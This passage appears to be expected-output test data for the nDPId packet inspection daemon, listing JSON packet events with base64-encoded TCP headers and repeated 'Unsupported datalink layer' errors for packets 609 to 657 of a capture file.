-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":609,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLMQABABoAdwKi0ArL40DbC2QBQ64tGkd7wreuAEC\/B0M4AAAEBCAoANZH4RwYi\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":610,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825963} -00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":610,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLNQABABoAQwKi0ArL40DbC2QBQ64tGkd7wreuwEC\/BhmoAAAEBCAoANZH4RwYi\/AEBBQre8Kh\/3vCt6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":611,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652825966} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":611,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLOQABABoAbwKi0ArL40DbC2QBQ64tGkd7ws1eAEC+sy3YAAAEBCAoANZH5RwYi\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":612,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826011} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":612,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLPQABABoAawKi0ArL40DbC2QBQ64tGkd7wuMOAEC\/qxbwAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":613,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826012} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":613,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLQQABABoAZwKi0ArL40DbC2QBQ64tGkd7wvi+AEC\/qwFAAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":614,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826014} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":614,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLRQABABoAYwKi0ArL40DbC2QBQ64tGkd7ww5uAEC\/WuvgAAAEBCAoANZH9RwYjCA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":615,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826018} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":615,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLSQABABoAXwKi0ArL40DbC2QBQ64tGkd7wyQeAEC\/qtXYAAAEBCAoANZH+RwYjCQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":616,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826071} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":616,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLTQABABoAWwKi0ArL40DbC2QBQ64tGkd7wznOAEC\/qr\/gAAAEBCAoANZIDRwYjFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":617,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826072} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":617,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLUQABABoAVwKi0ArL40DbC2QBQ64tGkd7w09+AEC\/qqowAAAEBCAoANZIDRwYjFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":618,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826081} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":618,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLVQABABoAUwKi0ArL40DbC2QBQ64tGkd7w2UuAEC\/qpRwAAAEBCAoANZIERwYjGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":619,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826083} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":619,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLWQABABoATwKi0ArL40DbC2QBQ64tGkd7w3reAEC\/qn7AAAAEBCAoANZIERwYjGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":620,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826126} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":620,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLXQABABoASwKi0ArL40DbC2QBQ64tGkd7w5COAEC\/qmjMAAAEBCAoANZIJRwYjJQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":621,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826127} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":621,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLYQABABoARwKi0ArL40DbC2QBQ64tGkd7w6Y+AEC\/qlMcAAAEBCAoANZIJRwYjJQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":622,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826130} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":622,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLZQABABoAQwKi0ArL40DbC2QBQ64tGkd7w7vuAEC\/Wj24AAAEBCAoANZIJRwYjJg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":623,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826130} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":623,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLaQABABoAPwKi0ArL40DbC2QBQ64tGkd7w9GeAEC\/BihcAAAEBCAoANZIJRwYjJg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":624,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826165} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":624,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLbQABABoAOwKi0ArL40DbC2QBQ64tGkd7w+dOAEC\/qhHMAAAEBCAoANZIMRwYjMg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":625,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826165} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":625,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLcQABABoANwKi0ArL40DbC2QBQ64tGkd7w\/z+AEC\/qfwYAAAEBCAoANZINRwYjMg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":626,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826174} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":626,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLdQABABoAMwKi0ArL40DbC2QBQ64tGkd7xCheAEC\/qdCwAAAEBCAoANZIORwYjMw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":627,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826201} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":627,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLeQABABoALwKi0ArL40DbC2QBQ64tGkd7xFO+AEC\/qaUoAAAEBCAoANZIQRwYjOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":628,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826204} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":628,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLfQABABoAKwKi0ArL40DbC2QBQ64tGkd7xH8eAEC\/qXm4AAAEBCAoANZIRRwYjPg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":629,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826229} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":629,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLgQABABoAJwKi0ArL40DbC2QBQ64tGkd7xKp+AEC\/qU5QAAAEBCAoANZITRwYjPg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":630,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826233} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":630,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLhQABABoAIwKi0ArL40DbC2QBQ64tGkd7xNXeAEC\/qSLYAAAEBCAoANZITRwYjRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":631,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826242} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":631,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLiQABABoAHwKi0ArL40DbC2QBQ64tGkd7xQE+AEC\/qPd0AAAEBCAoANZIURwYjRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":632,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826263} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":632,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLjQABABoAGwKi0ArL40DbC2QBQ64tGkd7xSyeAEC\/qMvsAAAEBCAoANZIWRwYjTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":633,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826303} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":633,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLkQABABoAFwKi0ArL40DbC2QBQ64tGkd7xVf+AEC\/qKB8AAAEBCAoANZIaRwYjTA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":634,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826322} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":634,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLlQABABn\/4wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qd98AAAEBCAoANZIcRwYjTAEBBQre8Vtr3vFg1w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":635,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826331} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":635,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLmQABABn\/3wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qcnIAAAEBCAoANZIdRwYjTAEBBQre8Vtr3vFmQw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":636,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826331} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":636,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLnQABABn\/2wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qbQYAAAEBCAoANZIdRwYjTAEBBQre8Vtr3vFrrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":637,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826385} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":637,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLoQABABn\/1wKi0ArL40DbC2QBQ64tGkd7xVf+wEC\/qZ5QAAAEBCAoANZIjRwYjTAEBBQre8Vtr3vFxGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":638,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826400} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":638,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLpQABABn\/swKi0ArL40DbC2QBQ64tGkd7xVf\/QEC\/qjEwAAAEBCAoANZIkRwYjTAEBBRLe8Xvz3vGBX97xW2ve8XEb"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":639,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826781} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":639,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLqQABABn\/zwKi0ArL40DbC2QBQ64tGkd7xcRuwEC+XG34AAAEBCAoANZJKRwYjpgEBBQre8Xvz3vGBXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":640,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826860} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":640,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLrQABABn\/qwKi0ArL40DbC2QBQ64tGkd7xcRvQEC\/WKkAAAAEBCAoANZJSRwYjpgEBBRLe8YbL3vGMN97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":641,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652826861} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":641,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLsQABABn\/pwKi0ArL40DbC2QBQ64tGkd7xcRvQEC\/WJNQAAAEBCAoANZJSRwYjpgEBBRLe8YbL3vGRo97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":642,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827279} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":642,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLtQABABn\/owKi0ArL40DbC2QBQ64tGkd7xdofQEC\/BHrcAAAEBCAoANZJ8RwYkQgEBBRLe8YbL3vGRo97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":643,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827343} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":643,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLuQABABn\/nwKi0ArL40DbC2QBQ64tGkd7xdofQEC\/BGUUAAAEBCAoANZKCRwYkQgEBBRLe8YbL3vGXD97xe\/Pe8YFf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":644,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827790} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLvQABABn\/uwKi0ArL40DbC2QBQ64tGkd7xgV+wEC+s6TAAAAEBCAoANZKvRwYkrQEBBQre8YbL3vGXDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":645,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827858} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":645,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLwQABABn\/lwKi0ArL40DbC2QBQ64tGkd7xgV\/QEC+szNIAAAEBCAoANZK2RwYkrQEBBRLe8Zx73vGh597xhsve8ZcP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":646,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827860} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":646,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMLxQABABn\/kwKi0ArL40DbC2QBQ64tGkd7xgV\/QEC+sx2YAAAEBCAoANZK2RwYkrQEBBRLe8Zx73vGnU97xhsve8ZcP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":647,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827918} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":647,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMLyQABABn\/rwKi0ArL40DbC2QBQ64tGkd7xlw+wEC+XrVsAAAEBCAoANZK8RwYk5gEBBQre8Zx73vGnUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":648,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":648,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMLzQABABn\/2wKi0ArL40DbC2QBQ64tGkd7xp1OAEC\/W1KEAAAEBCAoANZK9RwYk5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":649,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQML0QABABn\/pwKi0ArL40DbC2QBQ64tGkd7xp1OwEC\/Wl2sAAAEBCAoANZK9RwYk5gEBBQre8aHn3vGnUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":650,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827927} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":650,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML1QABABn\/0wKi0ArL40DbC2QBQ64tGkd7xrL+AEC\/Bz0oAAAEBCAoANZK9RwYk5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":651,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827969} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":651,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML2QABABn\/zwKi0ArL40DbC2QBQ64tGkd7xsiuAEC\/qyaYAAAEBCAoANZLBRwYk8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":652,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827970} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":652,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML3QABABn\/ywKi0ArL40DbC2QBQ64tGkd7xt5eAEC\/qxDgAAAEBCAoANZLBRwYk8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":653,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652827977} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":653,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML4QABABn\/xwKi0ArL40DbC2QBQ64tGkd7xvQOAEC\/qvskAAAEBCAoANZLCRwYk9Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":654,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828011} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":654,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML5QABABn\/wwKi0ArL40DbC2QBQ64tGkd7xwm+AEC\/quU0AAAEBCAoANZLFRwYlAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":655,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828014} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":655,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML6QABABn\/vwKi0ArL40DbC2QBQ64tGkd7xx9uAEC\/qs+EAAAEBCAoANZLFRwYlAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":656,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828019} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":656,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML7QABABn\/uwKi0ArL40DbC2QBQ64tGkd7xzUeAEC\/WrocAAAEBCAoANZLGRwYlAw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":657,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828073} 